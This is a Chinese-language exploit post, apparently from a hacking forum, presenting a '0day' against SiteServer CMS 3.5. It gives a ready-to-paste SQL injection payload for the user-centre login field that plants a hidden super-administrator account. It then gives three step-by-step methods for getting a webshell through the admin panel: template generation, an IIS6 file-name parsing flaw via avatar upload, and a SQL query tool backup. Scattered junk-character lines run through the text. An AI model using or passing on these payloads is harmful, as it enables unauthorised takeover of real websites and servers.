SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

& {8 b+ r. g: y2 z6 W$ ?1 t; Xstieserver官网:www.siteserver.cn
5 A: M4 X: X9 f- \1 h/ F


5 Z+ ?) _: k: P& lEXP:
# S, D  k9 }3 @; P, w2 H0 x- L: K
直接访问UserCenter/login.aspx



: m* V5 [# Q! G5 q% l4 a用户名处输入：
9 K; v6 A) e( B! J, U( R8 A
7 i6 h6 r$ R. @- M) E123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


6 g6 C6 W* |* m$ o- F
2 L( Y5 p( j  c; o& c7 @密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
1 h, m5 Z7 [0 p: Y$ O  t) ?9 Z
. l" v7 ^. P# Z* C& X

之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 W$ T' X2 i' Q: S  @
" ], n/ B5 ~' G

后台拿webshell的三种方法：

0 _. t) k# H4 F- z一、

0 R" G  d! `5 L% y1 S站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
3 \! L& b1 [8 \/ y# D) a
成员权限-》添加用户-》用户名为：1.asp
- G1 O1 r- A6 a/ L( F; n
. r2 F$ M& ^% _8 T% a  ehttp://127.0.0.1/usercenter/
+ W. V0 W' h" @# n/ H
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

' ~/ G" x( q' _* D- T（ps：后台添加用户时不会验证是否含有非法字符）

三、
& k* h+ }5 P- {  z4 K. w
6 E" j5 \6 F3 O6 d7 @4 W系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
% J9 p# v9 W; k
系统工具-》数据库工具-》SQL语句查询
; I( \. Z6 u( X+ ^9 o这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。